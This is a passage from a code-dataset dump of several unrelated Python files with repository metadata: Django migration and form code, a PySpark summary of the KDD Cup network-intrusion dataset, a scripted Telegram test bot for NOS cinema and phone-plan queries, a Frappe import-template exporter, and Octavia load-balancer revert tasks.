"INSERT INTO ip_vrf(name,vrf_group_id,rd) VALUES(%s,%s,%s)",
["default", vg_id, "0:0"],
)
vrf_id = self.db.execute("SELECT id FROM ip_vrf LIMIT 1")[0][0]
user_id = self.db.execute("SELECT id FROM auth_user LIMIT 1")[0][0]
asn_id = self.db.execute("SELECT id FROM peer_as WHERE asn=%s", [0])[0][0]
self.db.execute(
"""INSERT INTO ip_ipv4block(prefix,description,vrf_id,asn_id,modified_by_id,last_modified)
VALUES(%s,%s,%s,%s,%s,%s)""",
["0.0.0.0/0", "Root", vrf_id, asn_id, user_id, "now"],
)
def backwards(self):
pass
| 45.341463
| 106
| 0.506724
|
4a0a0ec700a852b6f5a41cac3e66fcbf0bc90eb4
| 925
|
py
|
Python
|
src/django_rpx_plus/forms.py
|
wsantos/django-rpx-plus
|
3c5ffc3d2a5bcacdf04f191c6ab04ae006c9a730
|
[
"BSD-3-Clause"
] | 1
|
2021-03-06T14:23:01.000Z
|
2021-03-06T14:23:01.000Z
|
src/django_rpx_plus/forms.py
|
wsantos/django-rpx-plus
|
3c5ffc3d2a5bcacdf04f191c6ab04ae006c9a730
|
[
"BSD-3-Clause"
] | 1
|
2017-12-06T17:42:57.000Z
|
2017-12-06T17:42:57.000Z
|
src/django_rpx_plus/forms.py
|
wsantos/django-rpx-plus
|
3c5ffc3d2a5bcacdf04f191c6ab04ae006c9a730
|
[
"BSD-3-Clause"
] | 7
|
2016-03-30T22:15:04.000Z
|
2022-01-12T18:10:26.000Z
|
from django import forms
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
class RegisterForm(forms.Form):
username = forms.RegexField(regex=r'^\w+$', max_length = 30, label = _('Username'),
error_messages={'invalid':_('The username must contain only letters, numbers and underscores.')})
email = forms.EmailField(label = _('Email Address'), max_length = 254)
def clean_username(self):
username = self.cleaned_data['username']
#Checking to make sure that username is unique.
try:
User.objects.get(username = username)
except User.DoesNotExist:
#This is good, means that we can use this username:
return username
#Otherwise, username exists. We can't use it.
raise forms.ValidationError(_('Username already exists! Please choose another one.'))
| 44.047619
| 129
| 0.667027
|
4a0a0f110092a5f3a928f69091c2a7b893abbfdf
| 2,937
|
py
|
Python
|
GoogleCloudPlatform/DataProc-Training/spark_analysis.py
|
jpacerqueira/project_lost_saturn
|
ce23e2881242441c9c74b2f0a66af1ebc5d3f351
|
[
"Apache-2.0"
] | 1
|
2020-04-13T09:19:43.000Z
|
2020-04-13T09:19:43.000Z
|
GoogleCloudPlatform/DataProc-Training/spark_analysis.py
|
jpacerqueira/project_lost_saturn
|
ce23e2881242441c9c74b2f0a66af1ebc5d3f351
|
[
"Apache-2.0"
] | 1
|
2020-10-28T12:45:32.000Z
|
2020-10-28T12:45:32.000Z
|
GoogleCloudPlatform/DataProc-Training/spark_analysis.py
|
jpacerqueira/project_lost_saturn
|
ce23e2881242441c9c74b2f0a66af1ebc5d3f351
|
[
"Apache-2.0"
] | 4
|
2020-03-14T05:17:37.000Z
|
2022-01-06T16:29:38.000Z
|
import matplotlib
matplotlib.use('agg')
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--bucket", help="bucket for input and output")
args = parser.parse_args()
BUCKET = args.bucket
from pyspark.sql import SparkSession, SQLContext, Row
gcs_bucket='qwiklabs-gcp-ffc84680e86718f5'
spark = SparkSession.builder.appName("kdd").getOrCreate()
sc = spark.sparkContext
data_file = "gs://"+gcs_bucket+"//kddcup.data_10_percent.gz"
raw_rdd = sc.textFile(data_file).cache()
raw_rdd.take(5)
csv_rdd = raw_rdd.map(lambda row: row.split(","))
parsed_rdd = csv_rdd.map(lambda r: Row(
duration=int(r[0]),
protocol_type=r[1],
service=r[2],
flag=r[3],
src_bytes=int(r[4]),
dst_bytes=int(r[5]),
wrong_fragment=int(r[7]),
urgent=int(r[8]),
hot=int(r[9]),
num_failed_logins=int(r[10]),
num_compromised=int(r[12]),
su_attempted=r[14],
num_root=int(r[15]),
num_file_creations=int(r[16]),
label=r[-1]
)
)
parsed_rdd.take(5)
sqlContext = SQLContext(sc)
df = sqlContext.createDataFrame(parsed_rdd)
connections_by_protocol = df.groupBy('protocol_type').count().orderBy('count', ascending=False)
connections_by_protocol.show()
df.registerTempTable("connections")
attack_stats = sqlContext.sql("""
SELECT
protocol_type,
CASE label
WHEN 'normal.' THEN 'no attack'
ELSE 'attack'
END AS state,
COUNT(*) as total_freq,
ROUND(AVG(src_bytes), 2) as mean_src_bytes,
ROUND(AVG(dst_bytes), 2) as mean_dst_bytes,
ROUND(AVG(duration), 2) as mean_duration,
SUM(num_failed_logins) as total_failed_logins,
SUM(num_compromised) as total_compromised,
SUM(num_file_creations) as total_file_creations,
SUM(su_attempted) as total_root_attempts,
SUM(num_root) as total_root_acceses
FROM connections
GROUP BY protocol_type, state
ORDER BY 3 DESC
""")
attack_stats.show()
# %matplotlib inline
ax = attack_stats.toPandas().plot.bar(x='protocol_type', subplots=True, figsize=(10,25))
ax[0].get_figure().savefig('report.png');
import google.cloud.storage as gcs
bucket = gcs.Client().get_bucket(BUCKET)
for blob in bucket.list_blobs(prefix='sparktobq/'):
blob.delete()
bucket.blob('sparktobq/report.pdf').upload_from_filename('report.png')
connections_by_protocol.write.format("csv").mode("overwrite").save(
"gs://{}/sparktobq/connections_by_protocol".format(BUCKET))
| 39.16
| 96
| 0.586994
|
4a0a10824f8cc383f019851f642e665b100e0664
| 13,597
|
py
|
Python
|
usability_tests_simulation/bot.py
|
PEI-I1/Telegram-API-Endpoint
|
6b6c4feaa3577f2860672277965c626a76adde82
|
[
"MIT"
] | null | null | null |
usability_tests_simulation/bot.py
|
PEI-I1/Telegram-API-Endpoint
|
6b6c4feaa3577f2860672277965c626a76adde82
|
[
"MIT"
] | 1
|
2021-06-02T00:54:33.000Z
|
2021-06-02T00:54:33.000Z
|
usability_tests_simulation/bot.py
|
PEI-I1/Telegram-API-Endpoint
|
6b6c4feaa3577f2860672277965c626a76adde82
|
[
"MIT"
] | null | null | null |
import requests
from config import TELEGRAM_SEND_MESSAGE_URL, TELEGRAM_SEND_PHOTO_URL, TELEGRAM_SEND_TYPING_ACTION
import json
import re
import time
class Bot:
def __init__(self):
self.chat = None # ID of Telegram chat
self.message_received = None # Message received on Telegram chat
self.first_name = None # First name of the user
self.msg_count = 1 # To control the test order
self.inputs = [] # Save inputs received
def send_message(self, html_text):
res = requests.get(TELEGRAM_SEND_MESSAGE_URL.format(self.chat, html_text, 'HTML'))
if res.status_code == 200:
return True
else:
return False
def send_movie(self, html_text, banner_url):
res = requests.get(TELEGRAM_SEND_PHOTO_URL.format(self.chat, banner_url, html_text, 'HTML'))
if res.status_code == 200:
return True
else:
return False
def send_typing_action(self):
res = requests.get(TELEGRAM_SEND_TYPING_ACTION.format(self.chat, 'typing'))
def parse_data(self, data):
message = data['message']
self.chat = message['chat']['id']
self.message_received = message['text'].lower()
self.first_name = message['from']['first_name']
self.inputs.append(self.message_received)
def save_on_file(self):
f = open("inputs_received.txt", "a")
for input in self.inputs:
f.write(input + '\n')
f.close()
def action(self):
if self.message_received == '/start':
self.send_message('Olá ' + self.first_name + '!\nEm que te posso ajudar?')
elif re.match(r'passo [0-9][01234]?', self.message_received):
words = self.message_received.split(' ')
count = int(words[1])
self.msg_count = count
self.send_message('Ok. Estou agora no passo ' + str(count) + '.')
else:
if self.msg_count == 1:
self.send_typing_action()
time.sleep(5)
# Pedir ao utilizador para consultar os cinemas mais próximos.
self.send_message('Os cinemas NOS perto de si num raio de 20Km são:\nBraga Parque')
elif self.msg_count == 2:
# Pedir ao utilizador para consultar os cinemas que existem em Lisboa.
self.send_message('Os cinemas NOS que correspondem com a sua pesquisa são:\nColombo,\nAmoreiras,\nAlvaláxia,\nVasco da Gama')
elif self.msg_count == 3:
# Pedir ao utilizador para consultar os filmes em exibição no Algarve (search_term).
self.send_message('Os filmes em exibição no Forum Algarve são:\nQu\'est-ce qu\'on a encore fait au Bon Dieu?,\nFrozen II,\nKnives Out,\nCharlie’s Angels,\nThe Aeronauts,\nStar Wars: Episode IX - The Rise of Skywalker')
self.send_message('Os filmes em exibição no Mar Shopping Algarve são:\nFrozen II,\nKnives Out,\nCharlie’s Angels,\nThe Aeronauts,\nLe Mans 66\',\nBikes,\nStar Wars: Episode IX - The Rise of Skywalker')
elif self.msg_count == 4:
# Pedir ao utilizador para consultar filmes com a participação do Kevin Hart.
self.send_movie(
'<b>Título:</b> Jumanji: O Nível Seguinte\n' +
'<b>Título original:</b> Jumanji: The Next Level\n' +
'<b>Elenco:</b> Dwayne Johnson, Jack Black, Kevin Hart\n' +
'<b>Produtor:</b> Jake Kasdan\n' +
'<b>Género:</b> Aventura\n' +
'<b>Duração:</b> 120 minutos\n' +
'<b>Idade:</b> 18 anos\n' +
'<b>Sinopse:</b> O gang está de volta, mas o jogo mudou. Quando regressam a Jumanji para resgatar um deles, descobrem que nada é como estavam à espera. Os jogadores terão de enfrentar lugares desconhecidos e inexplorados, desde os áridos desertos às montanhas nevadas, para escapar do jogo mais perigoso do mundo.\n' +
'<b>Trailer:</b> https://youtube.com/embed/yx9u6IsJrxM',
'http://cinemas.nos.pt/_layouts/15/Handlers/RenderImage.ashx?file=52259.jpg'
)
if self.msg_count == 5:
# Pedir ao utilizador para consultar próximas estreias.
self.send_message('As próximas estreias dos cinemas NOS são:')
self.send_movie(
'<b>Título:</b> Jumanji: The Next Level\n' +
'<b>Elenco:</b> Dwayne Johnson, Jack Black, Kevin Hart\n' +
'<b>Género:</b> Aventura',
'http://cinemas.nos.pt/_layouts/15/Handlers/RenderImage.ashx?file=52259.jpg'
)
self.send_movie(
'<b>Título:</b> 21 Bridges\n' +
'<b>Elenco:</b> Chadwick Boseman, J.K. Simmons, Sienna Miller\n' +
'<b>Género:</b> Ação',
'http://cinemas.nos.pt/_layouts/15/Handlers/RenderImage.ashx?file=52264.jpg'
)
elif self.msg_count == 6:
# Pedir ao utilizador para consultar próximas sessões.
self.send_message('Próximas sessões no Braga Parque:')
self.send_message(
'<b>Filme</b>: Joker\n' +
'<b>Data</b>: 09-12-2019\n' +
'<b>Hora de início</b>: 21:00:00\n' +
'<b>Lugares disponíveis</b>: 10\n' +
'<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1983870&DataSessao=2019-12-09&HoraSessao=21:00&Sala=5'
)
self.send_message(
'<b>Filme</b>: The Aeronauts\n' +
'<b>Data</b>: 09-12-2019\n' +
'<b>Hora de início</b>: 21:20:00\n' +
'<b>Lugares disponíveis</b>: 17\n' +
'<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1728200&DataSessao=2019-12-09&HoraSessao=21:20&Sala=6'
)
self.send_message(
'<b>Filme</b>: Playing with Fire\n' +
'<b>Data</b>: 09-12-2019\n' +
'<b>Hora de início</b>: 21:50:00\n' +
'<b>Lugares disponíveis</b>: 24\n' +
'<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1736700&DataSessao=2019-12-09&HoraSessao=21:50&Sala=9'
)
elif self.msg_count == 7:
# Pedir ao utilizador para consultar próximas sessões do filme Countdown.
self.send_message('Próximas sessões do filme Countdown no Braga Parque:')
self.send_message(
'<b>Data</b>: 09-12-2019\n' +
'<b>Hora de início</b>: 22:00:00\n' +
'<b>Lugares disponíveis</b>: 45\n' +
'<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1000318&DataSessao=2019-12-09&HoraSessao=22:00&Sala=1'
)
self.send_message(
'<b>Data</b>: 09-12-2019\n' +
'<b>Hora de início</b>: 00:25:00\n' +
'<b>Lugares disponíveis</b>: 60\n' +
'<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1000318&DataSessao=2019-12-10&HoraSessao=00:25&Sala=1'
)
elif self.msg_count == 8:
# Pedir ao utilizador para consultar a linha de apoio para esclarecimentos sobre pacotes da NOS.
self.send_message('Linha de apoio para pacotes com televisão:')
self.send_message(
'<b>Número:</b> 16990\n' +
'Para esclarecimentos ou informações adicionais sobre todos os produtos incluídos na fatura de televisão NOS (internet fixa, telefone, telemóvel e internet móvel)'
)
elif self.msg_count == 9:
# Pedir ao utilizador para consultar as informações do Sony Xperia 1.
self.send_message('Sony Xperia 1')
self.send_message(
'<b>Preço:</b> 959,99€\n' +
'<b>Ofertas:</b> Coluna Bluetooth\n' +
'<b>Link:</b> https://www.nos.pt/particulares/loja-equipamentos/pages/details.aspx?p=29783\n' +
'* possibilidade de pagamento em prestações\n' +
'* possibilidade de pagamento com pontos'
)
elif self.msg_count == 10:
# Pedir ao utilizador para consultar os telemóveis que se encontram em promoção.
self.send_message('Os telemóveis que correspondem à procura são:')
self.send_message(
'<b>Modelo:</b> Huawei P30 Pro\n' +
'<b>Preço:</b> 899,99€'
)
self.send_message(
'<b>Modelo:</b> Huawei Mate 20 Lite\n' +
'<b>Preço:</b> 239,99€'
)
self.send_message(
'<b>Modelo:</b> Huawei P30\n' +
'<b>Preço:</b> 689,99€'
)
self.send_message(
'<b>Modelo:</b> Samsung Galaxy S10\n' +
'<b>Preço:</b> 819,99€'
)
self.send_message(
'<b>Modelo:</b> Samsung Galaxy S10+\n' +
'<b>Preço:</b> 919,99€'
)
elif self.msg_count == 11:
# Pedir ao utilizador para consultar tarifários WTF.
self.send_message('Os pacotes WTF que correspondem à procura são:')
self.send_message(
'<b>Nome:</b> WTF 1GB\n' +
'<b>Preço:</b> 2.75/semana\n' +
'<b>Net:</b> 1GB/mês\n' +
'<b>SMS:</b> SMS grátis para todas as redes\n' +
'<b>Chamadas:</b> 1000 minutos para todas as redes'
)
self.send_message(
'<b>Nome:</b> WTF 5GB\n' +
'<b>Preço:</b> 3.99/semana\n' +
'<b>Net:</b> 5GB/mês\n' +
'<b>SMS:</b> SMS grátis para todas as redes\n' +
'<b>Chamadas:</b> 5000 minutos para todas as redes'
)
self.send_message(
'<b>Nome:</b> WTF 10GB\n' +
'<b>Preço:</b> 4.99/semana\n' +
'<b>Net:</b> 10GB/mês\n' +
'<b>SMS:</b> SMS grátis para todas as redes\n' +
'<b>Chamadas:</b> 10000 minutos para todas as redes'
)
elif self.msg_count == 12:
# Pedir ao utilizador para consultar os pacotes fibra até 25€ por mês.
self.send_message('Os pacotes fibra com valor entre 0€ e 25€ são:')
self.send_message(
'<b>Nome:</b> MIX\n' +
'<b>Preço:</b> 24,99€\n' +
'<b>Serviço:</b> TV'
)
self.send_message(
'<b>Nome:</b> NOS 2\n' +
'<b>Preço:</b> 13,49€\n' +
'<b>Serviço:</b> TV+VOZ'
)
self.send_message(
'<b>Nome:</b> Segunda Casa\n' +
'<b>Preço:</b> 13,99€\n' +
'<b>Serviço:</b> TV'
)
self.send_message(
'<b>Nome:</b> Light\n' +
'<b>Preço:</b> 13,99€\n' +
'<b>Serviço:</b> TV'
)
elif self.msg_count == 13:
# Pedir ao utilizador para consultar os pacotes satélite com TV e Internet.
self.send_message('Os pacotes satélite com serviço TV+NET disponíveis são:')
self.send_message(
'<b>Nome:</b> NOS 2 Segunda Casa + Net\n' +
'<b>Preço:</b> 27,99€\n' +
'<b>Serviço:</b> TV+NET'
)
self.send_message(
'<b>Nome:</b> NOS 2 Segunda Casa + Net\n' +
'<b>Preço:</b> 30,49€\n' +
'<b>Serviço:</b> TV+NET'
)
self.send_message(
'<b>Nome:</b> NOS 2 Segunda Casa + Net\n' +
'<b>Preço:</b> 27,99€\n' +
'<b>Serviço:</b> TV+NET'
)
elif self.msg_count == 14:
# Pedir ao utilizador para consultar lojas NOS que existem em Portalegre.
self.send_message('As lojas NOS existentes em Portalegre são:')
self.send_message(
'<b>Nome:</b> Loja NOS Portalegre - Continente\n' +
'<b>Morada:</b> CC Continente Portalegre - R. Joinal, 12 - lj. 1 Portalegre 7300-526\n' +
'<b>Horário:</b> Segunda a Sexta: 09h00 - 21h00\n' +
' Sábado: 09h00 - 21h00\n' +
' Domingo: 09h00 - 21h00'
)
elif self.msg_count > 14:
self.send_message('Chegaste ao fim do teste!')
self.msg_count = self.msg_count + 1
| 52.296154
| 338
| 0.503935
|
4a0a133651b0f7982fa7d1e75021f71caa365f6e
| 9,097
|
py
|
Python
|
frappe/core/doctype/data_import/exporter.py
|
gangadhar-kadam/saloon-frappe
|
ec4bb97f8e63449324d07346ec87a76c6d075b40
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/data_import/exporter.py
|
gangadhar-kadam/saloon-frappe
|
ec4bb97f8e63449324d07346ec87a76c6d075b40
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/data_import/exporter.py
|
gangadhar-kadam/saloon-frappe
|
ec4bb97f8e63449324d07346ec87a76c6d075b40
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
import frappe.permissions
import re, csv, os
from frappe.utils.csvutils import UnicodeWriter
from frappe.utils import cstr, formatdate, format_datetime
from frappe.core.doctype.data_import.importer import get_data_keys
from six import string_types
reflags = {
"I":re.I,
"L":re.L,
"M":re.M,
"U":re.U,
"S":re.S,
"X":re.X,
"D": re.DEBUG
}
@frappe.whitelist()
def get_template(doctype=None, parent_doctype=None, all_doctypes="No", with_data="No", select_columns=None,
from_data_import="No", excel_format="No"):
all_doctypes = all_doctypes=="Yes"
if select_columns:
select_columns = json.loads(select_columns);
docs_to_export = {}
if doctype:
if isinstance(doctype, string_types):
doctype = [doctype];
if len(doctype) > 1:
docs_to_export = doctype[1]
doctype = doctype[0]
if not parent_doctype:
parent_doctype = doctype
column_start_end = {}
if all_doctypes:
child_doctypes = []
for df in frappe.get_meta(doctype).get_table_fields():
child_doctypes.append(dict(doctype=df.options, parentfield=df.fieldname))
def get_data_keys_definition():
return get_data_keys()
def add_main_header():
w.writerow([_('Data Import Template')])
w.writerow([get_data_keys_definition().main_table, doctype])
if parent_doctype != doctype:
w.writerow([get_data_keys_definition().parent_table, parent_doctype])
else:
w.writerow([''])
w.writerow([''])
w.writerow([_('Notes:')])
w.writerow([_('Please do not change the template headings.')])
w.writerow([_('First data column must be blank.')])
w.writerow([_('If you are uploading new records, leave the "name" (ID) column blank.')])
w.writerow([_('If you are uploading new records, "Naming Series" becomes mandatory, if present.')])
w.writerow([_('Only mandatory fields are necessary for new records. You can delete non-mandatory columns if you wish.')])
w.writerow([_('For updating, you can update only selective columns.')])
w.writerow([_('You can only upload upto 5000 records in one go. (may be less in some cases)')])
if key == "parent":
w.writerow([_('"Parent" signifies the parent table in which this row must be added')])
w.writerow([_('If you are updating, please select "Overwrite" else existing rows will not be deleted.')])
def build_field_columns(dt, parentfield=None):
meta = frappe.get_meta(dt)
# build list of valid docfields
tablecolumns = []
for f in frappe.db.sql('desc `tab%s`' % dt):
field = meta.get_field(f[0])
if field and ((select_columns and f[0] in select_columns[dt]) or not select_columns):
tablecolumns.append(field)
tablecolumns.sort(key = lambda a: int(a.idx))
_column_start_end = frappe._dict(start=0)
if dt==doctype:
_column_start_end = frappe._dict(start=0)
else:
_column_start_end = frappe._dict(start=len(columns))
append_field_column(frappe._dict({
"fieldname": "name",
"parent": dt,
"label": "ID",
"fieldtype": "Data",
"reqd": 1,
"idx": 0,
"info": _("Leave blank for new records")
}), True)
for docfield in tablecolumns:
append_field_column(docfield, True)
# all non mandatory fields
for docfield in tablecolumns:
append_field_column(docfield, False)
# if there is one column, add a blank column (?)
if len(columns)-_column_start_end.start == 1:
append_empty_field_column()
# append DocType name
tablerow[_column_start_end.start + 1] = dt
if parentfield:
tablerow[_column_start_end.start + 2] = parentfield
_column_start_end.end = len(columns) + 1
column_start_end[(dt, parentfield)] = _column_start_end
def append_field_column(docfield, for_mandatory):
if not docfield:
return
if for_mandatory and not docfield.reqd:
return
if not for_mandatory and docfield.reqd:
return
if docfield.fieldname in ('parenttype', 'trash_reason'):
return
if docfield.hidden:
return
if select_columns and docfield.fieldname not in select_columns.get(docfield.parent, []):
return
tablerow.append("")
fieldrow.append(docfield.fieldname)
labelrow.append(_(docfield.label))
mandatoryrow.append(docfield.reqd and 'Yes' or 'No')
typerow.append(docfield.fieldtype)
inforow.append(getinforow(docfield))
columns.append(docfield.fieldname)
def append_empty_field_column():
tablerow.append("~")
fieldrow.append("~")
labelrow.append("")
mandatoryrow.append("")
typerow.append("")
inforow.append("")
columns.append("")
def getinforow(docfield):
"""make info comment for options, links etc."""
if docfield.fieldtype == 'Select':
if not docfield.options:
return ''
else:
return _("One of") + ': %s' % ', '.join(filter(None, docfield.options.split('\n')))
elif docfield.fieldtype == 'Link':
return 'Valid %s' % docfield.options
elif docfield.fieldtype == 'Int':
return 'Integer'
elif docfield.fieldtype == "Check":
return "0 or 1"
elif hasattr(docfield, "info"):
return docfield.info
else:
return ''
def add_field_headings():
w.writerow(tablerow)
w.writerow(labelrow)
w.writerow(fieldrow)
w.writerow(mandatoryrow)
w.writerow(typerow)
w.writerow(inforow)
w.writerow([get_data_keys_definition().data_separator])
def add_data():
def add_data_row(row_group, dt, parentfield, doc, rowidx):
d = doc.copy()
meta = frappe.get_meta(dt)
if all_doctypes:
d.name = '"'+ d.name+'"'
if len(row_group) < rowidx + 1:
row_group.append([""] * (len(columns) + 1))
row = row_group[rowidx]
_column_start_end = column_start_end.get((dt, parentfield))
if _column_start_end:
for i, c in enumerate(columns[_column_start_end.start:_column_start_end.end]):
df = meta.get_field(c)
fieldtype = df.fieldtype if df else "Data"
value = d.get(c, "")
if value:
if fieldtype == "Date":
value = formatdate(value)
elif fieldtype == "Datetime":
value = format_datetime(value)
row[_column_start_end.start + i + 1] = value
if with_data=='Yes':
frappe.permissions.can_export(parent_doctype, raise_exception=True)
# sort nested set doctypes by `lft asc`
order_by = None
table_columns = frappe.db.get_table_columns(parent_doctype)
if 'lft' in table_columns and 'rgt' in table_columns:
order_by = '`tab{doctype}`.`lft` asc'.format(doctype=parent_doctype)
# get permitted data only
data = frappe.get_list(doctype, fields=["*"], limit_page_length=None, order_by=order_by)
for doc in data:
op = docs_to_export.get("op")
names = docs_to_export.get("name")
if names and op:
if op == '=' and doc.name not in names:
continue
elif op == '!=' and doc.name in names:
continue
elif names:
try:
sflags = docs_to_export.get("flags", "I,U").upper()
flags = 0
for a in re.split('\W+',sflags):
flags = flags | reflags.get(a,0)
c = re.compile(names, flags)
m = c.match(doc.name)
if not m:
continue
except:
if doc.name not in names:
continue
# add main table
row_group = []
add_data_row(row_group, doctype, None, doc, 0)
if all_doctypes:
# add child tables
for c in child_doctypes:
for ci, child in enumerate(frappe.db.sql("""select * from `tab{0}`
where parent=%s and parentfield=%s order by idx""".format(c['doctype']),
(doc.name, c['parentfield']), as_dict=1)):
add_data_row(row_group, c['doctype'], c['parentfield'], child, ci)
for row in row_group:
w.writerow(row)
w = UnicodeWriter()
key = 'parent' if parent_doctype != doctype else 'name'
add_main_header()
w.writerow([''])
tablerow = [get_data_keys_definition().doctype, ""]
labelrow = [_("Column Labels:"), "ID"]
fieldrow = [get_data_keys_definition().columns, key]
mandatoryrow = [_("Mandatory:"), _("Yes")]
typerow = [_('Type:'), 'Data (text)']
inforow = [_('Info:'), '']
columns = [key]
build_field_columns(doctype)
if all_doctypes:
for d in child_doctypes:
append_empty_field_column()
if (select_columns and select_columns.get(d['doctype'], None)) or not select_columns:
# if atleast one column is selected for this doctype
build_field_columns(d['doctype'], d['parentfield'])
add_field_headings()
add_data()
if from_data_import == "Yes" and excel_format == "Yes":
filename = frappe.generate_hash("", 10)
with open(filename, 'wb') as f:
f.write(cstr(w.getvalue()).encode("utf-8"))
f = open(filename)
reader = csv.reader(f)
from frappe.utils.xlsxutils import make_xlsx
xlsx_file = make_xlsx(reader, "Data Import Template")
f.close()
os.remove(filename)
# write out response as a xlsx type
frappe.response['filename'] = doctype + '.xlsx'
frappe.response['filecontent'] = xlsx_file.getvalue()
frappe.response['type'] = 'binary'
else:
# write out response as a type csv
frappe.response['result'] = cstr(w.getvalue())
frappe.response['type'] = 'csv'
frappe.response['doctype'] = doctype
| 29.535714
| 123
| 0.68682
|
4a0a145c6d95f55c0e473ec051b4317d40735ee7
| 25
|
py
|
Python
|
scavenger/api/scraper/__init__.py
|
Gulats/scavenger
|
ba8a712a60ae9f4f4ebdbc8111369c9a5954aa05
|
[
"MIT"
] | null | null | null |
scavenger/api/scraper/__init__.py
|
Gulats/scavenger
|
ba8a712a60ae9f4f4ebdbc8111369c9a5954aa05
|
[
"MIT"
] | 4
|
2019-01-28T17:47:31.000Z
|
2019-01-28T17:56:25.000Z
|
scavenger/api/scraper/__init__.py
|
Gulats/scavenger
|
ba8a712a60ae9f4f4ebdbc8111369c9a5954aa05
|
[
"MIT"
] | null | null | null |
from .controller import *
| 25
| 25
| 0.8
|
4a0a148fde8709574e0dfb3084815e0d3c424ca6
| 7,126
|
py
|
Python
|
octavia/controller/worker/v2/tasks/lifecycle_tasks.py
|
johnsom/octavia
|
41c628a084002017d2003926cf0e25ba3ffeee0c
|
[
"Apache-2.0"
] | null | null | null |
octavia/controller/worker/v2/tasks/lifecycle_tasks.py
|
johnsom/octavia
|
41c628a084002017d2003926cf0e25ba3ffeee0c
|
[
"Apache-2.0"
] | null | null | null |
octavia/controller/worker/v2/tasks/lifecycle_tasks.py
|
johnsom/octavia
|
41c628a084002017d2003926cf0e25ba3ffeee0c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from taskflow import task
from octavia.common import constants
from octavia.controller.worker import task_utils as task_utilities
class BaseLifecycleTask(task.Task):
"""Base task to instansiate common classes."""
def __init__(self, **kwargs):
self.task_utils = task_utilities.TaskUtils()
super(BaseLifecycleTask, self).__init__(**kwargs)
class AmphoraIDToErrorOnRevertTask(BaseLifecycleTask):
"""Task to checkpoint Amphora lifecycle milestones."""
def execute(self, amphora_id):
pass
def revert(self, amphora_id, *args, **kwargs):
self.task_utils.mark_amphora_status_error(amphora_id)
class AmphoraToErrorOnRevertTask(AmphoraIDToErrorOnRevertTask):
"""Task to checkpoint Amphora lifecycle milestones."""
def execute(self, amphora):
pass
def revert(self, amphora, *args, **kwargs):
super(AmphoraToErrorOnRevertTask, self).revert(
amphora.get(constants.ID))
class HealthMonitorToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set a member to ERROR on revert."""
def execute(self, health_mon, listeners, loadbalancer):
pass
def revert(self, health_mon, listeners, loadbalancer, *args, **kwargs):
self.task_utils.mark_health_mon_prov_status_error(
health_mon[constants.POOL_ID])
self.task_utils.mark_pool_prov_status_active(
health_mon[constants.POOL_ID])
self.task_utils.mark_loadbalancer_prov_status_active(
loadbalancer[constants.LOADBALANCER_ID])
for listener in listeners:
self.task_utils.mark_listener_prov_status_active(
listener[constants.LISTENER_ID])
class L7PolicyToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set a l7policy to ERROR on revert."""
def execute(self, l7policy, listeners, loadbalancer_id):
pass
def revert(self, l7policy, listeners, loadbalancer_id, *args, **kwargs):
self.task_utils.mark_l7policy_prov_status_error(
l7policy[constants.L7POLICY_ID])
self.task_utils.mark_loadbalancer_prov_status_active(loadbalancer_id)
for listener in listeners:
self.task_utils.mark_listener_prov_status_active(
listener[constants.LISTENER_ID])
class L7RuleToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set a l7rule to ERROR on revert."""
def execute(self, l7rule, l7policy_id, listeners, loadbalancer_id):
pass
def revert(self, l7rule, l7policy_id, listeners, loadbalancer_id, *args,
**kwargs):
self.task_utils.mark_l7rule_prov_status_error(
l7rule[constants.L7RULE_ID])
self.task_utils.mark_l7policy_prov_status_active(l7policy_id)
self.task_utils.mark_loadbalancer_prov_status_active(
loadbalancer_id)
for listener in listeners:
self.task_utils.mark_listener_prov_status_active(
listener[constants.LISTENER_ID])
class ListenerToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set a listener to ERROR on revert."""
def execute(self, listener):
pass
def revert(self, listener, *args, **kwargs):
self.task_utils.mark_listener_prov_status_error(
listener[constants.LISTENER_ID])
self.task_utils.mark_loadbalancer_prov_status_active(
listener[constants.LOADBALANCER_ID])
class ListenersToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set a listener to ERROR on revert."""
def execute(self, listeners):
pass
def revert(self, listeners, *args, **kwargs):
for listener in listeners:
self.task_utils.mark_listener_prov_status_error(
listener[constants.LISTENER_ID])
self.task_utils.mark_loadbalancer_prov_status_active(
listeners[0][constants.LOADBALANCER_ID])
class LoadBalancerIDToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set the load balancer to ERROR on revert."""
def execute(self, loadbalancer_id):
pass
def revert(self, loadbalancer_id, *args, **kwargs):
self.task_utils.mark_loadbalancer_prov_status_error(loadbalancer_id)
class LoadBalancerToErrorOnRevertTask(LoadBalancerIDToErrorOnRevertTask):
"""Task to set the load balancer to ERROR on revert."""
def execute(self, loadbalancer):
pass
def revert(self, loadbalancer, *args, **kwargs):
super(LoadBalancerToErrorOnRevertTask, self).revert(
loadbalancer[constants.LOADBALANCER_ID])
class MemberToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set a member to ERROR on revert."""
def execute(self, member, listeners, loadbalancer, pool_id):
pass
